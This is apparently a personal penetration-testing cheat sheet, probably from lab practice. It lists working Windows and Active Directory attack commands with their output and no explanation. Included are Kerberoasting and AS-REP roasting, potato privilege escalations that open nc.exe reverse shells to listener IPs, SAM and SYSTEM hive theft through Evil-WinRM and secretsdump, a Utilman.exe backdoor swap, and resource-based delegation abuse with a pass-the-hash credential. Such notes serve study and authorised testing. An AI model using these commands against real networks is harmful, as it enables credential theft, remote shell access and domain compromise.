impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete

Rubeus.exe kerberoast /nowrap /outfile:hash /format:hashcat

.\Rubeus.exe asreproast /nowrap /outfile:hash.txt`

impacket-GetNPUsers corp.com/dave -dc-ip 192.168.114.70

.\SigmaPotato.exe --revshell 192.168.45.188 4444

.\godpotato.exe -cmd "nc.exe 192.168.45.246 443 -e cmd"

.\JuicyPotatoNG.exe -t * -p "c:\windows\system32\cmd.exe" -a "/c C:\users\chen\nc.exe 192.168.45.226 443 -e cmd"

*Evil-WinRM* PS C:\users\anirudh> reg save hklm\sam ./sam
The operation completed successfully.

*Evil-WinRM* PS C:\users\anirudh> reg save hklm\system ./system
The operation completed successfully.

*Evil-WinRM* PS C:\users\anirudh> download sam
Info: Downloading C:\users\anirudh\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\users\anirudh> download system
Info: Downloading C:\users\anirudh\system to system
Info: Download successful!

impacket-secretsdump -system system -sam sam local                             

.\EnableSeRestorePrivilege.ps1

ren C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.pwned
ren C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe

rdesktop 192.168.134.165

gmsapasswordreader.exe --accountname svc_apache

impacket-addcomputer resourced.local/l.livingstone -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'fake$' -computer-pass 'password!' -dc-ip 192.168.176.175 

[*] Successfully added machine account fake$ with password password!

impacket-rbcd resourced.local/l.livingstone -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -delegate-from 'fake$' -delegate-to 'RESOURCEDC$' -action write -dc-ip 192.168.176.175

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] fake$ can now impersonate users on RESOURCEDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     fake$        (S-1-5-21-537427935-490066102-1511301751-4101)